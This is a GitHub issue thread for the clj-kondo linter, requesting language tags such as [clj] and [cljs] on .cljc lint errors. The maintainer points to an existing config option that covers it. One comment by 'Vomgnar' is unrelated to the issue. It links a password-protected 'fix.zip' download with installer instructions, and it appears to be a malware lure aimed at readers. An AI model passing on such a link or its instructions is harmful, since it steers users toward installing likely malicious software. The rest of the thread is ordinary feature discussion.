### ISSUE TITLE
Report language in cljc lint errors

### ISSUE THREAD

**Issue by yuhan0** [clj-kondo/clj-kondo#2380]
To upvote this issue, give it a thumbs up. See [this list](https://github.com/clj-kondo/clj-kondo/issues?q=is%3Aissue+is%3Aopen+sort%3Areactions-%2B1-desc) for the most upvoted issues.

- [x] I have read the [Clojure etiquette](https://clojure.org/community/etiquette) and will respect it when communicating on this platform.

**Is your feature request related to a problem? Please describe.**
The Clojure and Clojurescript core libraries differ in various ways, and the fact that Clj-kondo picks up on these differences is very valuable - often indicating that the places where a reader conditional is needed.

However, this means that the error messages when linting `.cljc` files can end up being confusing, eg:

```bash
$ echo '(class :a)' | clj-kondo --lang cljc --lint -
<stdin>:1:2: error: Unresolved symbol: class
linting took 13ms, errors: 1, warnings: 0
```

Here `class` is a valid function in `clojure.core` but not `cljs.core`, but the error message does not reflect this distinction.

**Describe the solution you'd like**
Append language info to the linting output, eg. given
```clj
(when (object? x)
  (format "%s" x))
```

The output could look something like
```
repro.cljc:1:8: error[clj]: Unresolved symbol: object?
repro.cljc:1:16: error[clj,cljs]: Unresolved symbol: x
repro.cljc:2:4: error[cljs]: Unresolved symbol: format
```

**Describe alternatives you've considered**
Alternatively, in the case where the error occurs in both languages, the `[clj,cljs]` could be omitted - i.e. the info is not relevant. This may help reduce noise especially if more dialects are supported in the future, rather than having something like `[clj,cljs,cljd,jank,bb]` appear in every lint message.

**Additional context**
Are there cases where errors would be reported by both languages but with different lint messages? I couldn't think of one offhand.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by borkdude** [comment]
See https://github.com/clj-kondo/clj-kondo/blob/master/doc/config.md#show-language-context-in-cljc-files
